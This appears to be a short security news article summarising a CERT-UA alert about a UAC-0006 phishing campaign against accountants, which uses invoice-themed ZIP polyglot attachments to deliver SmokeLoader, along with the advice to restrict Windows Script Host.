An ongoing phishing campaign has been identified by CERT-UA, in which attackers are abusing compromised email accounts to send phishing emails containing invoice lures. The main target of the attack is the computers used by financial accountants. The attackers aim to gain remote access to banking systems by using the SmokeLoader malware.
A financially motivated campaign
The alert warns that the attackers are using spam emails with the subject “bill/payments” with a ZIP archive attached.
- The attacks have been linked to the financially motivated UAC-0006 group, which has been active since at least 2013.
- The attackers attempt to steal authentication-related information, such as credentials, keys, or certificates, and then, create unauthorized financial transactions into accounts controlled by them.
- The attached ZIP archive is a polyglot file, meaning that it is a single file that can be interpreted as multiple file formats. It consists of a decoy document and a JavaScript file.
Digging deeper into the polyglot file
- The polyglot file, named pax_2023_AB1058..js, uses PowerShell to download and run further payloads. Specifically, it downloads an executable file called portable.exe, which, when run, launches the SmokeLoader malware.
- The compilation date of the file and the date of registration of the domain involved indicate that the campaign started in April 2023.
- Once running, SmokeLoader injects malicious code into currently running processes and proceeds with downloads of other payloads.
What to do?
The CERT-UA has suggested that Javascript loaders, which are typically used at the initial stage of the attack, can be blocked by restricting the launch of Windows Script Host (wscript.exe) on the PC. Additionally, they have provided relevant indicators of compromise (IoCs), which can be used to restrict the SmokeLoader-related file on the other side of the security fence.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/7bf8_shutterstock_1243363546_1.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/d33b_shutterstock_1553442719.jpg)
